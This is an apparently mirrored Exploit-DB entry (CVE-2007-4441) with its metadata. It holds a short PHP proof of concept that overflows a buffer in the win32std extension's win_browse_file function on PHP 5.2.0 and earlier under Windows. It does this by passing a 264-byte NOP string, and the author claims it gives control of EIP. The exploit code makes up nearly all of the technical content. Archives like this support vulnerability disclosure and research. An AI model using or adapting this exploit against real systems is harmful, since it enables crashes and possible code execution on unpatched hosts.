- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4293
- Проверка EDB
-
- Пройдено
- Автор
- BOECKE
- Тип уязвимости
- DOS
- Платформа
- WINDOWS_X86
- CVE
- cve-2007-4441
- Дата публикации
- 2007-08-18
PHP:
<?php
// ==================================================================================
//
// php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow
//
// [x] Discovery: boecke <[email protected]>
// [x] Risk: Local Buffer Overflow (Medium - High Risk)
// [x] Notes: EDX and EIP are able to be controlled and therefore
// have the potential to dictate program flow.
//
// [x] "Sangre, sonando, de rabia naci.. Who do you trust?"
//
// ==================================================================================
if ( !extension_loaded("win32std") )
{
die;
}
win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );
?>
# milw0rm.com [2007-08-18]
- Источник
- www.exploit-db.com